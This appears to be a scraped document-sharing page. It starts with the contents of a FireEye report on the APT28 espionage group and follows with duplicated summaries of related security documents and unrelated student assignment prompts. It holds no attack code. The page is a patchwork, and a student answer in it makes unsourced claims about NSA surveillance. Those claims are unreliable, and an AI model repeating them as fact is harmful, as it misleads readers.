APT28:
A WINDOW INTO RUSSIA’S CYBER
ESPIONAGE OPERATIONS?
SPECIAL REPORT
SECURITY
REIMAGINED
2 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
EXECUTIVE SUMMARY ................................................................................................................................................................................................................................................................................... 3
APT28 TARGETING REFLECTS RUSSIAN INTERESTS ........................................................................................................................................................................ 6
APT28 interest in the Caucasus, Particularly Georgia ........................................................................................................................................................... 7
APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA) ....................................................................................... 8
APT28 Targeting of the Georgian Ministry of Defense ....................................................................................................................................... 9
APT28 Targeting a Journalist Covering the Caucasus ...................................................................................................................................... 10
APT28’s Other Targets in the Caucasus ....................................................................................................................................................................................... 11
APT28 Targeting of Eastern European Governments and Militaries ................................................................................................... 12
APT28 Targeting of NATO and Other European Security Organizations .................................................................................... 14
APT28 Targets European Defense Exhibitions ............................................................................................................................................................... 16
Other APT28 Targets Are Consistent With Nation State Interests ........................................................................................................ 17
APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS ........................................................................................................................ 19
Modular Implants Indicate a Formal Development Environment............................................................................................................... 24
APT28 Malware Indicates Russian Speakers in a Russian Time Zone ................................................................................................ 25
Compile Times Align with Working Hours in Moscow and St. Petersburg ......................... ...
APT 28 :Cyber Espionage and the Russian Government?anupriti
Russia may be behind a long-standing, careful campaign designed to steal sensitive data relating to governments, militaries and security firms worldwide.This presentation based on a report made public by FireEye brings an over view of their opinion.....uploaded here just for general info to understand how its all happening!!!!
This white paper analyzes the advanced persistent threat (APT) group known as APT28 or Sofacy. It details their targeting of victims in Ukraine, Spain, Russia, Romania, US and Canada for intelligence gathering. The paper describes the attribution of APT28 to Russian-speaking actors based on compilation times and filenames. It then outlines the scanning process used to find new targets, the multi-stage attack flow to compromise systems, and examples of victims identified from stolen emails including political and aerospace industry targets.
APT29 is a Russian state-sponsored hacking group known as Cozy Bear that has been operating since at least 2008. It is highly sophisticated with extensive operational security and regularly improves its tactics. APT29 targets governments, militaries, think tanks, and other private companies worldwide to conduct cyber espionage in support of Russian government objectives. While no public reports have directly attributed zero-day exploits to APT29, security researchers have warned they actively scan for vulnerabilities as part of their operations.
Russian cyber offense strategy development Yuri Livshitz
This document provides an overview of Russian cyber offense strategy development and capabilities building. It discusses key factors that motivated Russia's selection of cyber offense as a vital tool, including weaknesses in the military after the Soviet Union's dissolution. It outlines General Gerasimov's theory of "hybrid warfare" which emphasizes non-military means for achieving goals and influenced Russia's approach. The document also examines Russia's efforts to build unified cyber offensive networks and cooperate internationally, as well as strategies for resilience in response to potential Western retaliation. Overall, it analyzes the evolution of Russia's cyber capabilities and strategy from both an academic and strategic perspective.
The document summarizes a report from Novetta analyzing the 2014 Sony Pictures Entertainment (SPE) attack. It finds that malware used in the SPE attack is linked to a wider set of malware developed by a group called the Lazarus Group since at least 2009. The Lazarus Group demonstrates a range of technical skills and has targeted various industries, primarily in South Korea and the US. The report aims to profile the Lazarus Group and link the SPE attack to its broader malicious activities.
Presentation of Research. Russia Information Security Market 2009 : Beginning...LETA IT-company
LETA IT-company presents the fourth expert report on information security market: “Information Security Market 2009: Beginning of the Compliance Age”. The first report was issued at the beginning of 2007, the second – in the middle of 2008 and the third – in the middle of 2009, with the many estimates becoming recognized facts on the IT market.
This research is dedicated to the Russian Information Security market. The research provides information on its volume, structure and key players. For the purposes of this research, the IS market means the market of all services including services providing information security of networks, equipment and systems of state and commercial organizations.
It is emphasized that it was not the aim of the authors to cover all the Russian IS market segments in detail. Thus, a certain number of market segments were left aside, in particular, network security, web-security and etc. LETA IT-company had to limit the choice of segments due to constrained resources and information with respect to certain segments.
A special attention in this research is drawn to the problems of the personal data protection, being the most important issue of the IS market in 2009.
Information for the given research was obtained by interrogation of the market participants by the expert interview method, and analysis of publications in mass media and other public domains. The authors used public information of the leading research companies— IDC, Gartner, PwC, Ernst&Young and etc.
All the numerical data represent the expert opinion of journalists, market participants and analysts of LETA IT-company. The research refers to the estimates of the top authenticity sources, leading business and specialized mass media, representatives of major companies and etc.
Tendencies and forecasts on the IS market are compiled on the basis of tendencies and forecasts of the RF economy development in general, development of the IT market, Russian and world IS market, estimates and calculations of LETA IT-company’s analysts.
The peculiarity of this research is that is states the names of the articles authors, which makes it possible for the readers to get in touch with them, should any questions, proposals or remarks arise.
The stuxnet computer worm. harbinger of an emerging warfare capabilityYury Chemerkin
The document summarizes a Congressional Research Service report on the Stuxnet computer worm. It discusses how Stuxnet targeted Iranian nuclear facilities by infecting industrial control systems. It affected systems in several countries and demonstrated that cyber attacks could disrupt critical infrastructure. The report examines questions for Congress about national security, an international treaty on malicious software, and protecting critical infrastructure from cyber threats.
(IT)Cyber SectorAs required by Presidential Policy Directiv.docxhoney725342
(IT)/Cyber Sector
As required by Presidential Policy Directive 21 (PPD-21), the current version of the National Infrastructure Protection Plan (NIPP 2013—also referred to as the National Plan) provides a unifying structure to define a single program for integrating critical infrastructure and key resources (CI/KR) protection. PPD-21 also assigned a federal agency as the lead Sector-Specific Agency (SAA) for each of the 16 critical infrastructures identified in PPD-21. Each SSA is responsible for developing and implementing an updated Sector-Specific Plan (SSP) for its sector. The original SSPs were published in 2010 based on a Letter of Agreement in the 2009 version of the NIPP, but were updated in 2015. The SSPs detail the application of the NIPP concepts to the unique characteristics and conditions of each sector.
A growing number of hacking incidents or cyber attacks in recent years has raised concerns about the adequacy of the SSP to address major threats or hazards in our IT sector and cyber space. This includes major hacking into credit card records or other IT/data systems at Lockheed Martin (a major defense contractor), RSA the security division of a major data storage company for financial institutions), SONY, major banking institutions, Target Stores, and the even the U.S. State Department. In fact, in 2010 alone, the U.S. government was subject to over 300,000 cyber attacks on its infrastructure. There were also suspicions that hacking into Google e-mail (gmail) accounts for high-ranking U.S. officials could be traced to China, and the CIA Web site was hacked. Many other incidents have occurred since then. There are also ongoing investigations about Russian hacking into the 2016 Presidential election process.
The IT sector is inextricably linked with the Communications sector, and interdependencies exist with all other CI/KR sectors. Technological advances and rapid development or modernization of a wide variety of systems and processes that depend on a secure IT system, including the Internet and the “cloud,” ensure that IT/cyber security will demand increasing attention in the future. Ensuring IT and cybersecurity is incredibly complex and challenging due to technological complexities and our global interconnectedness, which make it very difficult to detect, deter, trace, defend against, prosecute or counter cyber attacks and hacking.
You and the members of your team should assume the role of senior government officials representing DHS and other federal agencies and entities with responsibilities for ensuring the security of the U.S. IT sector and cyber space. Threats and hazards in this vital CI/KR sector carry potentially enormous consequences to our national economy, to national security and defense, to privacy, and to confidence in our government.
President Trump has asked about the security of our IT sector and cyber space and protection from intentional terrorist or espionage attacks, criminal or malicious hackers ...
APT 28 :Cyber Espionage and the Russian Government?anupriti
Russia may be behind a long-standing, careful campaign designed to steal sensitive data relating to governments, militaries and security firms worldwide.This presentation based on a report made public by FireEye brings an over view of their opinion.....uploaded here just for general info to understand how its all happening!!!!
This white paper analyzes the advanced persistent threat (APT) group known as APT28 or Sofacy. It details their targeting of victims in Ukraine, Spain, Russia, Romania, US and Canada for intelligence gathering. The paper describes the attribution of APT28 to Russian-speaking actors based on compilation times and filenames. It then outlines the scanning process used to find new targets, the multi-stage attack flow to compromise systems, and examples of victims identified from stolen emails including political and aerospace industry targets.
APT29 is a Russian state-sponsored hacking group known as Cozy Bear that has been operating since at least 2008. It is highly sophisticated with extensive operational security and regularly improves its tactics. APT29 targets governments, militaries, think tanks, and other private companies worldwide to conduct cyber espionage in support of Russian government objectives. While no public reports have directly attributed zero-day exploits to APT29, security researchers have warned they actively scan for vulnerabilities as part of their operations.
Russian cyber offense strategy development Yuri Livshitz
This document provides an overview of Russian cyber offense strategy development and capabilities building. It discusses key factors that motivated Russia's selection of cyber offense as a vital tool, including weaknesses in the military after the Soviet Union's dissolution. It outlines General Gerasimov's theory of "hybrid warfare" which emphasizes non-military means for achieving goals and influenced Russia's approach. The document also examines Russia's efforts to build unified cyber offensive networks and cooperate internationally, as well as strategies for resilience in response to potential Western retaliation. Overall, it analyzes the evolution of Russia's cyber capabilities and strategy from both an academic and strategic perspective.
The document summarizes a report from Novetta analyzing the 2014 Sony Pictures Entertainment (SPE) attack. It finds that malware used in the SPE attack is linked to a wider set of malware developed by a group called the Lazarus Group since at least 2009. The Lazarus Group demonstrates a range of technical skills and has targeted various industries, primarily in South Korea and the US. The report aims to profile the Lazarus Group and link the SPE attack to its broader malicious activities.
Presentation of Research. Russia Information Security Market 2009 : Beginning...LETA IT-company
LETA IT-company presents the fourth expert report on information security market: “Information Security Market 2009: Beginning of the Compliance Age”. The first report was issued at the beginning of 2007, the second – in the middle of 2008 and the third – in the middle of 2009, with the many estimates becoming recognized facts on the IT market.
This research is dedicated to the Russian Information Security market. The research provides information on its volume, structure and key players. For the purposes of this research, the IS market means the market of all services including services providing information security of networks, equipment and systems of state and commercial organizations.
It is emphasized that it was not the aim of the authors to cover all the Russian IS market segments in detail. Thus, a certain number of market segments were left aside, in particular, network security, web-security and etc. LETA IT-company had to limit the choice of segments due to constrained resources and information with respect to certain segments.
A special attention in this research is drawn to the problems of the personal data protection, being the most important issue of the IS market in 2009.
Information for the given research was obtained by interrogation of the market participants by the expert interview method, and analysis of publications in mass media and other public domains. The authors used public information of the leading research companies— IDC, Gartner, PwC, Ernst&Young and etc.
All the numerical data represent the expert opinion of journalists, market participants and analysts of LETA IT-company. The research refers to the estimates of the top authenticity sources, leading business and specialized mass media, representatives of major companies and etc.
Tendencies and forecasts on the IS market are compiled on the basis of tendencies and forecasts of the RF economy development in general, development of the IT market, Russian and world IS market, estimates and calculations of LETA IT-company’s analysts.
The peculiarity of this research is that is states the names of the articles authors, which makes it possible for the readers to get in touch with them, should any questions, proposals or remarks arise.
The stuxnet computer worm. harbinger of an emerging warfare capabilityYury Chemerkin
The document summarizes a Congressional Research Service report on the Stuxnet computer worm. It discusses how Stuxnet targeted Iranian nuclear facilities by infecting industrial control systems. It affected systems in several countries and demonstrated that cyber attacks could disrupt critical infrastructure. The report examines questions for Congress about national security, an international treaty on malicious software, and protecting critical infrastructure from cyber threats.
(IT)Cyber SectorAs required by Presidential Policy Directiv.docxhoney725342
(IT)/Cyber Sector
As required by Presidential Policy Directive 21 (PPD-21), the current version of the National Infrastructure Protection Plan (NIPP 2013—also referred to as the National Plan) provides a unifying structure to define a single program for integrating critical infrastructure and key resources (CI/KR) protection. PPD-21 also assigned a federal agency as the lead Sector-Specific Agency (SAA) for each of the 16 critical infrastructures identified in PPD-21. Each SSA is responsible for developing and implementing an updated Sector-Specific Plan (SSP) for its sector. The original SSPs were published in 2010 based on a Letter of Agreement in the 2009 version of the NIPP, but were updated in 2015. The SSPs detail the application of the NIPP concepts to the unique characteristics and conditions of each sector.
A growing number of hacking incidents or cyber attacks in recent years has raised concerns about the adequacy of the SSP to address major threats or hazards in our IT sector and cyber space. This includes major hacking into credit card records or other IT/data systems at Lockheed Martin (a major defense contractor), RSA the security division of a major data storage company for financial institutions), SONY, major banking institutions, Target Stores, and the even the U.S. State Department. In fact, in 2010 alone, the U.S. government was subject to over 300,000 cyber attacks on its infrastructure. There were also suspicions that hacking into Google e-mail (gmail) accounts for high-ranking U.S. officials could be traced to China, and the CIA Web site was hacked. Many other incidents have occurred since then. There are also ongoing investigations about Russian hacking into the 2016 Presidential election process.
The IT sector is inextricably linked with the Communications sector, and interdependencies exist with all other CI/KR sectors. Technological advances and rapid development or modernization of a wide variety of systems and processes that depend on a secure IT system, including the Internet and the “cloud,” ensure that IT/cyber security will demand increasing attention in the future. Ensuring IT and cybersecurity is incredibly complex and challenging due to technological complexities and our global interconnectedness, which make it very difficult to detect, deter, trace, defend against, prosecute or counter cyber attacks and hacking.
You and the members of your team should assume the role of senior government officials representing DHS and other federal agencies and entities with responsibilities for ensuring the security of the U.S. IT sector and cyber space. Threats and hazards in this vital CI/KR sector carry potentially enormous consequences to our national economy, to national security and defense, to privacy, and to confidence in our government.
President Trump has asked about the security of our IT sector and cyber space and protection from intentional terrorist or espionage attacks, criminal or malicious hackers ...
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It is marketed for surveillance of serious crimes and terrorism but was found on a leaked list of 50,000 phone numbers belonging to journalists, politicians, activists and others. The Pegasus Project investigation revealed how governments have used the spyware to spy on these groups. NSO claims their technology helps governments fight crime and terrorism.
4. Search the Web for uses of Big Data in homeland security. Specifi.pdfsktambifortune
4. Search the Web for uses of Big Data in homeland security. Specifically, read about the spying
by the U.S. National Security Agency (NSA). What role did technology and Big Data play in this
questionable practice?
Solution
Homeland Security Research Corp. forecast that the big data and data analytics in Homeland
Security and Public Safety market will be spear headed by rapid growth in Asia Pacific and
Europe, with CAGR in the low 20s for both regions, especially due to the Chinese and Western
European homeland security and public safety markets.
The U.S. National Security Agency spying on the all over world by analyzing the data i.e the
data it may come from social media or from any company. The NSA spy on all accounts as many
ways its possible. Recently Snow den that he reveal the information regarding the NSA’s secret
operations.
He mentioned that NSA developed a separate search engine type algorithm that it displays the
every possible key of the given query. Through these available data they analyzed the suspect.
And also through these search engine they directly connect our personal devices without our
permission.
The main Example is they connect with our personal smart phone without our permission they
activate our phone camera and watch what we are doing there. These mainly disturb our personal
life..
Albert Helps Protect from Hacking JRN 4.docxnettletondevon
Albert Helps Protect from Hacking
JRN 497 Journalism and Mass Communication Capstone
Ceiara Culver
August 18, 2018
Voter security has increased as people get ready for the 2018 midterm elections. Many
states have decided to install cyber-intrusion systems supplied by Homeland Security.
Government officials have created these systems to prevent hacking during the 2018 mid-term
elections by foreign countries. This comes in response to the 2016 presidential election where
there were cyber-attacks from Russia (Snow, 2016).
The system that was developed is called Albert. It is similar to
another program called Einstein, which is another Homeland
Security program that is an intrusion detection system. Albert is the
updated version of this that helps to detect viruses and malicious malware that can affect
computers and software. The centers send information through a network that detects if there is
malicious software, if there is the center gives out an alert to be analyzed by security operations
(dhs, 2018). According to one government official, the program is a success and it has helped
to track many cyber threats. Albert has already detected 50,000
notices of malicious activity. Another person says that Albert may
not be a good idea because of the problem with not knowing if the
program is detecting malicious software from foreign countries or if
they are tracking people from within the United States. And that the
program tracks people from their cellphones and giving away their control. There are also some
states that have not decided to go with Albert but with other programs (Marquardt, 2018).
Albert has initiated a lot of mixed feelings in some people. There are those that work
for the suppliers of the system that believe it works great and helps protect against hacking
from foreign countries like Russia during the 2016 presidential election and those that believe
that Albert is a way to give up control and can be getting information from united states
citizens instead of foreign countries.
Resource
Marquardt, A. (2018, August 17). States add intrusion sensors to election systems to thwart
hacking. Retrieved from https://www.cnn.com/2018/08/17/politics/states-
intrustionsensors-election-systems/index.html
Snow, J. Einstein's little bro: Used by most states, Albert guards against malware. (2016,
December 27). Retrieved from https://www.fedscoop.com/ms-isac-einstein-inspired-
program-almost- used-by-every-state/
EINSTEIN. (2018, May 17). Retrieved from https://www.dhs.gov/einstein
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-s.
This paper presents a framework to automatically detect disinformation campaigns on social media. The framework integrates natural language processing, machine learning, graph analysis, and causal inference. It collects social media posts, identifies narratives, classifies accounts as real or influence operations, maps the network of accounts spreading each narrative, and estimates the causal impact of each account in spreading the narrative. The framework was tested on real Twitter data from the 2017 French election and detected influence operation accounts with 96% precision and 79% recall. It also identified communities and high impact accounts that were corroborated by other sources.
This document discusses cyber crime and cyber security. It begins by defining cyber security as technologies and processes designed to protect computers and data from unauthorized access. Cyber crime is defined as illegal activities committed using computers or networks. The document then provides statistics on cyber crimes in India by state, with the highest rates in Maharashtra and Uttar Pradesh. It also ranks the top countries for cyber crimes in 2016, with the US ranked first and Vietnam ranked last. China is identified as the top hacking country in 2016. The most common type of cyber attack is viruses, while financial fraud is the least common. The document concludes by providing tips for protecting against cyber crimes such as using firewalls and strong passwords.
On How the Darknet and its Access to SCADA is a Threat to National Critical I...Matthew Kurnava
This document analyzes how the darknet poses a threat to national critical infrastructure. It begins with an introduction that defines the darknet and describes some of the illegal activities that occur there. The research question asks how the darknet threatens critical infrastructure and how vulnerable different sectors are. The hypothesis is that the darknet poses a primary threat to US cyber critical infrastructure due to criminal, hacktivist, and terrorist use that could significantly damage health and welfare. A literature review discusses research on darknet cyber attacks, hacktivist and terrorist groups using the darknet, and critical infrastructure's growing dependency on technology and vulnerability. The methodology will use an analytical approach to examine threats to each of the 16 US critical infrastructure sectors.
Case Study - Cyberterrorism—A New RealityWhen hackers claiming .docxcowinhelen
Case Study - Cyberterrorism—A New Reality:
When hackers claiming to support the Syrian regime of Bashar Al-Assad attacked and disabled the website of Al Jazeera, the Qatar-based satellite news channel, in September 2012, the act was another act of hacktivism, purporting to promote a specific political agenda over another. Hacktivism has become a very visible form of expressing dissent. Even though there have been numerous incidents reported by the media, the first case of hacktivism was documented in 1989 when a member of the Cult of the Dead Cow hacker collective named Omega coined the term in 1996. However, hacktivism is not the only form of cyber protest and conflict that has everyone from ICT professionals to governments scrambling for solutions. Individuals, enterprises, and governments alike rely in many instances almost completely on network computing technologies, including cloud computing. The international and ever-evolving nature of the Internet along with inadequate law enforcement and the anonymity the global architecture offers creates opportunities for hackers to attack vulnerable nodes for personal, financial, or political gain.
The Internet is also rapidly becoming the political and advocacy platform of choice, bringing with it both positive and negative consequences. Increasingly sophisticated off-the-shelf technologies and easy access to the Internet are significantly increasing incidents of cyberterrorism, netwars, and cyberwarfare. The following are a few examples.
• According to The Israel Electric Company, Israel is attacked 1,000 times a minute by cyberterrorists targeting the country’s infrastructure—water, electricity, communications, and other services.• The New York Times, quoting military officials, said there was a seventeen-fold increase in cyberattacks targeting the US critical infrastructure between 2009 and 2011.• The 2010 Data Breach Investigations Report has data recording more than 900 instances of computer hacking and other data breaches in the past seven years, resulting in some 900 million compromised records. In 2012, the same study listed 855 breaches, resulting in 174 million compromised records in 2011 alone, up from 4 million in 2010.• Another study of 49 breaches in 2011 reported that the average organizational cost of a data breach (including detection, internal response, notification, post notification cost) was $5.5 million. This number was down from $7.2 million in 2010.14 The Telegraph (London) reported that “India blamed a new ‘cyber-jihad’ by Pakistani militant groups for the exodus of thousands of people from India’s north-eastern minorities from its main southern cities in August after text messages warning them to flee went viral.”
There have been recorded instances of nations allegedly engaging in cyberwarfare. The Center for the Study of Technology and Society has identified five methods by which cyberwarfare can be used as a means of military action. These include defacing or di.
This document is a report from Comodo Threat Research Labs summarizing malware trends in 2017. It finds that trojans were the most common malware type, making up 41% of detections, followed by applications at 24.7% and backdoors at 10.1%. Russia and the US had the most malware detections. The report analyzes trends in specific malware types like trojans, applications, backdoors, and worms. It also examines detections by country and region. Comodo predicts backdoor detections will continue rising in Q1 2018 based on a rise seen in Q4 2017.
TOTEM: Threat Observation, Tracking, and Evaluation ModelJohn Gerber
Merriam-Webster defines a totem as any supposed entity that watches over or assists a group of people, such as a family, clan, or tribe. In this presentation I will focus on how TOTEM assists in watching over and evaluating the threat an IP represents. The idea behind TOTEM is simple: compare threat information from sources such as watchlists (DShield, Emerging Threats, SenderBase, etc.) to activities with the organization (IDS/IPS, flow logs, etc.) and other locations (SANS ISC, DOE federated model, etc.). As new threat information and activity sources are added, a better evaluation can be rendered.
Project 4 Threat Analysis and ExploitationTranscript (backgroun.docxstilliegeorgiana
Project 4: Threat Analysis and Exploitation
Transcript (background):
You are part of a collaborative team that was created to address cyber threats and exploitation of US financial systems critical infrastructure. Your team has been assembled by the White House Cyber National security staff to provide situational awareness about a current network breach and cyber attack against several financial service institutions. Your team consists of four roles, a representative from the financial services sector who has discovered the network breach and the cyber attacks. These attacks include distributed denial of service attacks, DDOS, web defacements, sensitive data exfiltration, and other attack vectors typical of this nation state actor. A representative from law enforcement who has provided additional evidence of network attacks found using network defense tools. A representative from the intelligence agency who has identified the nation state actor from numerous public and government provided threat intelligence reports. This representative will provide threat intelligence on the tools, techniques, and procedures of this nation state actor. A representative from the Department of Homeland Security who will provide the risk, response, and recovery actions taken as a result of this cyber threat. Your team will have to provide education and security awareness to the financial services sector about the threats, vulnerabilities, risks, and risk mitigation and remediation procedures to be implemented to maintain a robust security posture. Finally, your team will take the lessons learned from this cyber incident and share that knowledge with the rest of the cyber threat analysis community. At the end of the response to this cyber incident, your team will provide two deliverables, a situational analysis report, or SAR, to the White House Cyber National security staff and an After Action Report and lesson learned to the cyber threat analyst community.
Step 2: Assessing Suspicious Activity
Your team is assembled and you have a plan. It's time to get to work. You have a suite of tools at your disposal from your work in Project 1, Project 2, and Project 3, which can be used together to create a full common operating picture of the cyber threats and vulnerabilities that are facing the US critical infrastructure.
To be completed by all team members: Leverage the network security skills of using port scans, network scanning tools, and analyzing Wireshark files, to assess any suspicious network activity and network vulnerabilities.
Step 3: The Financial Sector
To be completed by the Financial Services Representative: Provide a description of the impact the threat would have on the financial services sector. These impact statements can include the loss of control of the systems, the loss of data integrity or confidentiality, exfiltration of data, or something else. Also provide impact assessments as a result of this security incident to the financial ...
This document proposes five core primitives that are building blocks for Networks of 'Things' (NoTs), including the Internet of Things (IoT):
1) Sensors - which measure physical properties and output data
2) Aggregators - which collect and process data from multiple sensors
3) Communication channels - which allow for data transfer between primitives
4) External utilities (eUtilities) - which are entities outside the NoT that can input or output data
5) Decision triggers - which initiate actions based on aggregated data
These primitives provide a framework for analyzing reliability, security, and trust in NoTs.
7122017 cyber espionage is alive and well apt32 and the thrsmile790243
FireEye analyzed cyber espionage activities of APT32, a threat group believed to be operating out of Vietnam. APT32 has targeted private companies with business interests in Vietnam as well as foreign governments and dissidents since at least 2014. APT32 uses phishing emails with malicious attachments or links to infect victims and install backdoors on their systems. These backdoors include unique malware families as well as commercially available tools and communicate with command and control servers controlled by APT32. FireEye investigated multiple intrusions attributed to APT32 and outlined their targeting and sophisticated tactics.
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It provides full access to a targeted phone's data, communications, and sensors. An investigation revealed that governments used Pegasus to spy on journalists, politicians, activists and others. Over 50,000 phone numbers on a leaked list were analyzed, with many showing forensic evidence of Pegasus infection, indicating illegal surveillance. In India, it was alleged that the government used Pegasus to spy on WhatsApp messages of activists and politicians, and numbers linked to a Supreme Court case accusing the former Chief Justice of sexual harassment were also reportedly targeted.
Learning ResourcesRequired ReadingsToseland, R. W., & Ri.docxfestockton
Learning Resources
Required Readings
Toseland, R. W., & Rivas, R. F. (2017).
An introduction to group work practice
(8th ed.). Boston, MA: Pearson.
Chapter 11, “Task Groups: Foundation Methods” (pp. 336-363)
Chapter 12, “Task Groups: Specialized Methods” (pp. 364–395)
Van Velsor, P. (2009). Task groups in the school setting: Promoting children’s social and emotional learning.
Journal for Specialists in Group Work
,
34
(3), 276–292.
Document:
Group Wiki Project Guidelines (PDF)
Recommended Resources
Holosko, M. J., Dulmus, C. N., & Sowers, K. M. (2013). Social work practice with individuals and families: Evidence-informed assessments and interventions. Hoboken, NJ: John Wiley & Sons, Inc.
Chapter 1 “Assessment of Children”
Chapter 2 “Intervention with Children”
Discussion: Task Groups
Group work is a commonly used method within school settings. Because peer interaction is important in the emotional and social development of children, the task group can serve as a wonderful therapeutic setting and tool; however, many factors should be considered when implementing this type of intervention.
For this Discussion, read the Van Velsor (2009) article.
By Day 3
Post
your understanding of task groups as an intervention for children. Use the model for effective problem solving to compare and contrast (how to identify the problem, develop goals, collect data). How does this model differ from a traditional treatment group? What are the advantages and possible disadvantages of this model? Describe how you might use this model for adults. What populations would most benefit from this model?
.
LeamosEscribamos Completa el párrafo con las formas correctas de lo.docxfestockton
Leamos/Escribamos Completa el párrafo con las formas correctas de los verbos en paréntesis. Usa el pretérito o el imperfecto.
Yo __1__ (criarse) en el campo, pero mi familia __2__
(mudarse) a la ciudad cuando yo tenía doce años. Hablábamos
aymara en mi pueblo, y mi mamá no __3__ (expresarse) bien en
español. Mis hermanos y yo __4__ (comunicarse) sin problema
porque habíamos estudiado español en el colegio. Con dificultad
nosotros __5__ (acostumbrarse) al estilo de vida.Yo __6__
(preocuparse) por todo. No me __7__ (gustar) el ruido de los
carros. Pero poco a poco, nostros __8__ (asimilar) el modo de
ser de la gente de la cuidad.Yo __9__ (graduarse) de la
universidad hace poco, mi hermano mayor ahora es arquitecto, y
mi hermano menor __10__ (casarse) el mes pasado.
.
Leadership via vision is necessary for success. Discuss in detail .docxfestockton
Leadership via "vision" is necessary for success. Discuss in detail the qualities that a leader must exhibit in order to be considered visionary and, further, how these qualities may be learned and developed. Provide research and share insight on the determination of a specific leadership theory associated with leadership via vision. Cite your posting in proper APA format and ensure that your posting provides a minimum of 5 paragraphs.
.
Learning about Language by Observing and ListeningThe real.docxfestockton
Learning about Language by Observing and Listening
The real voyage of discovery consists not in seeking
new landscapes, but in having new eyes. Marcel Proust
The UCSD experience encompasses academic as well as social learning. Therefore, we learn not only from our courses, but from the people we meet on campus and the experiences we have with them. Life is a journey of self-discovery. As individuals, we are constantly seeking to determine who we are and where we belong in the world. Throughout this process, language is both a bridge and a barrier to communication and human growth.
The general subject matter for this essay is language or language communities. The source of your information will be what you observe and hear by listening to others. The goal is to do a project based on what our own minds can comprehend from diligent observation, note-taking, and reasoning. You should arrive at a reasoned (not emotional) conclusion. The conclusion/result of your experiment is your thesis and should be presented in the opening paragraph in one sentence. Secondary material should not be brought into this essay. Thus, this is not an essay that needs to be the result of academic texts or online sources. The research is what you see and how you interpret what you see and hear. It will be up to you to determine what particular focus your essay will take and wahat meaning you wish to convey to your reader. Do the exploratory writing activities on pages 73-76. These activities will guide you through an analysis of some of the reflections you completed in the first part of your book. Once you determine your focus, you will use the information you have already gathered and additional information you will research to clarify your ideas and provide evidence for the points you wish to make.
If you prefer a more direct prompt, the suggested topics listed below might be helpful to you. Choose one of the following topics to establish a focus and direction.
1) From your observations and conversations, what assumptions and stereotypes do we make about people based on language and behavior? What did you learn from the experiment?
2) You may examine body language as well as verbal language. Explore nonverbal communication in a group. What conclusions can you come to regarding the group based on nonverbal behavior?
3) Did you observe language differences between men and women here at UCSD Notice the ways in which men and women treat one another. Observe the language you hear on campus.
How do women greet one another? How do men greet each other? Do not just note the similarities or differences. Explain and interpret the information.
4) Observe and identify a code language on campus, on your job, or in your personal arena. How is language used? Is it effective? Analyze.
5) Have you become keenly aware of code switching? Who utilizes this language? In your observations and conversations, did you find code switching to be an acceptable form of lang.
Learning Accomplishment Profile-Diagnostic Spanish Language Edit.docxfestockton
Learning Accomplishment Profile-Diagnostic Spanish Language Edition
The Ages and Stages Questionnaires-Social Emotional (ASQ-SE)
Learning Accomplishment Profile-3 (LAP-3)
Mullen Scales of Early Learning
Purpose of the screening-what can an early childhood professional do with the results? What should happen next?
.
Learning about Language by Observing and ListeningThe real voy.docxfestockton
Learning about Language by Observing and Listening
The real voyage of discovery consists not in seeking
new landscapes, but in having new eyes. Marcel Proust
The UCSD experience encompasses academic as well as social learning. Therefore, we learn not only from our courses, but from the people we meet on campus and the experiences we have with them. Life is a journey of self-discovery. As individuals, we are constantly seeking to determine who we are and where we belong in the world. Throughout this process, language is both a bridge and a barrier to communication and human growth.
The general subject matter for this essay is language or language communities. The source of your information will be what you observe and hear by listening to others. The goal is to do a project based on what our own minds can comprehend from diligent observation, note-taking, and reasoning. You should arrive at a reasoned (not emotional) conclusion. The conclusion/result of your experiment is your thesis and should be presented in the opening paragraph in one sentence. Secondary material should not be brought into this essay. Thus, this is not an essay that needs to be the result of academic texts or online sources. The research is what you see and how you interpret what you see and hear. It will be up to you to determine what particular focus your essay will take and wahat meaning you wish to convey to your reader. Do the exploratory writing activities on pages 73-76. These activities will guide you through an analysis of some of the reflections you completed in the first part of your book. Once you determine your focus, you will use the information you have already gathered and additional information you will research to clarify your ideas and provide evidence for the points you wish to make.
If you prefer a more direct prompt, the suggested topics listed below might be helpful to you. Choose one of the following topics to establish a focus and direction.
1) From your observations and conversations, what assumptions and stereotypes do we make about people based on language and behavior? What did you learn from the experiment?
2) You may examine body language as well as verbal language. Explore nonverbal communication in a group. What conclusions can you come to regarding the group based on nonverbal behavior?
3) Did you observe language differences between men and women here at UCSD Notice the ways in which men and women treat one another. Observe the language you hear on campus.
How do women greet one another? How do men greet each other? Do not just note the similarities or differences. Explain and interpret the information.
4) Observe and identify a code language on campus, on your job, or in your personal arena. How is language used? Is it effective? Analyze.
5) Have you become keenly aware of code switching? Who utilizes this language? In your observations and conversations, did you find code switching to be an accepta.
LEARNING OUTCOMES1. Have knowledge and understanding of the pri.docxfestockton
LEARNING OUTCOMES:
1. Have knowledge and understanding of the principles of Constitutional and Administrative Law, and of the way in which these principles have developed.
2. Deal with issues relating to Constitutional and Administrative Law both systematically and creatively, recognising potential alternative conclusions for particular situations and providing supporting reasons for such conclusions.
3. Demonstrate self-direction and originality in tackling and solving problems relating to Constitutional and Administrative Law.
4. Research primary and secondary sources of Constitutional and Administrative Law.
5. Communicate thoughts and ideas in writing and/or orally, using the English language and legal terminology with care, clarity and accuracy.
6. Manage time effectively.
QUESTION:
A recently elected Government, concerned about rising gun crime by drug dealers, has introduced a Bill into Parliament to bring back the death penalty for any person convicted of causing death by the use of a firearm and which is also related to an illegal drug trade.
Human Rights UK (HRUK), part of a worldwide protest organisation called ‘Global Human Rights’ is opposed to the death penalty in any circumstances. HRUK has many thousands of members across the UK. The organisation is split into county groups and there is a thriving branch of over 1200 members in Penfield.
Sam Jones, the leader of the Penfield branch, has proposed a local demonstration against the Bill to take place on the 1
st
May 2014. The demonstration includes a march from the Town Hall in Penfield City Centre to the local War Memorial followed by speeches from senior members of the organisation.
